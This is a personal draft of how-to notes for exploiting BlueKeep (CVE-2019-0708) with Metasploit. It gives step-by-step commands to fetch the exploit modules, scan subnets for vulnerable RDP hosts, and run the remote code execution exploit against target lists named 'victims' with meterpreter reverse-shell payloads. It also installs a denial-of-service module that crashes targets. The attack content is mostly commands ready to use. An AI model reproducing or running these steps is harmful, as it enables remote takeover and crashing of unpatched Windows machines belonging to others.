BLUEKEEP

ongoing draft

INTRODUCTION

On Friday, 6 September 2019, in the late afternoon, the Metasploit exploit module was announced and published. Either keep your repo and master branch but override these files:

ls -l lib/msf/core/exploit/rdp.rb*
mv lib/msf/core/exploit/rdp.rb lib/msf/core/exploit/rdp.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/lib/msf/core/exploit/rdp.rb" > lib/msf/core/exploit/rdp.rb

ls -l modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb*
mv modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb" > modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

ls -l modules/auxiliary/scanner/rdp/rdp_scanner.rb*
mv modules/auxiliary/scanner/rdp/rdp_scanner.rb modules/auxiliary/scanner/rdp/rdp_scanner.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/auxiliary/scanner/rdp/rdp_scanner.rb" > modules/auxiliary/scanner/rdp/rdp_scanner.rb

#ls -l modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb*
#mv modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb.old
mkdir -p modules/exploits/windows/rdp/
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb" > modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Or just use busterb's fork on the bluekeep branch. I am not sure a new SQL user and database are required, but it's probably better to do it. Anyhow, the first way is better, as all the non-custom payloads will be loadable from the console, while only reverse_tcp successfully loads on busterb's.

mv metasploit-framework/ metasploit-framework.rapid7/
git clone --single-branch --branch bluekeep git://github.com/busterb/metasploit-framework.git
cd metasploit-framework/
bundle install
./msfupdate
#git checkout bluekeep
git branch

ATTACK SURFACE & PATCHES

Windows XP (all)
Windows 2003 (all)
Windows 7 SP1 (32 and 64 bit)
  64-bit --> KB4489878
Windows Server 2008
Windows Server 2008 R2

METASPLOIT CHECK

You can do this from behind a NAT.

msfconsole

search bluekeep

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhosts x.x.x.x/xx
set threads 8
grep -v refused run

You should see a few of these:

The target is not exploitable.

and in case there is one of these:

The target is vulnerable.

then, if desired, proceed with the following.

METASPLOIT EXPLOIT

Now you need a directly routed IP or port forwarding for the reverse shell.

Ping continuously to make sure you don't crash the remote system, and be ready to run nmap -p 4444,8443 from the subnet to check whether the handler is not only listening (netstat -lntup) but actually reachable.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
show advanced
set rhosts REMOTE-HOST(S)
set rhosts file:/home/msf/victims
set rhosts file:/home/msf/victims1vulnerable

show targets
#set target 0
set target 1

show payloads
set payload windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_https

set lhost YOU-REACHABLE
#set lport 4447
#set lport 443
#set forceexploit true
set -g loglevel 3
set consolelogging true
set sessionlogging true
run

There is no need to run check, as it is done by default.

So far, this is what I got:

Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

BSoD - mekhalleh DoS

mkdir ~/bluekeep/
cd ~/bluekeep/
git clone https://github.com/mekhalleh/cve-2019-0708.git
mv cve-2019-0708 mekhalleh-dos/

cd /opt/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/bluekeep/mekhalleh-dos/cve_2019_0708_bluekeep_dos.rb ./

(re)start Metasploit

cd /opt/metasploit-framework/
msfconsole -q
search bluekeep

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep_dos

show options
set rhosts x.x.x.x
run

RESOURCES

BlueKeep https://en.wikipedia.org/wiki/BlueKeep

check

CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check https://www.rapid7.com/db/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Suggestion: Add module for CVE-2019-0708 #11852 https://github.com/rapid7/metasploit-framework/issues/11852

cve_2019_0708_bluekeep.md https://nest.parrotsec.org/security-tools/metasploit-framework/blob/23529c80cad1e776eb184d7694b8f42a6cd5aad4/documentation/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.md

Scanning the network for the CVE-2019-0708 (BlueKeep) vulnerability using the Metasploit module and the rdpscan utility on Kali Linux 2019.2 https://blog.it-kb.ru/2019/06/13/network-scanning-for-cve-2019-0708-bluekeep-vulnerability-using-the-metasploit-module-and-rdpscan-tool-build-on-kali-linux/

bsod

mekhalleh/cve-2019-0708 https://github.com/mekhalleh/cve-2019-0708

settings

Metasploit set rhosts file http://travisaltman.com/metasploit-set-rhosts-file/

reverse shell

How to use a reverse shell in Metasploit https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit

msfcli prevents the use of custom payload modules since 4.7.1 #3704 https://github.com/rapid7/metasploit-framework/issues/3704

exploit

Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

Add initial exploit for CVE-2019-0708, BlueKeep #12283 https://github.com/rapid7/metasploit-framework/pull/12283
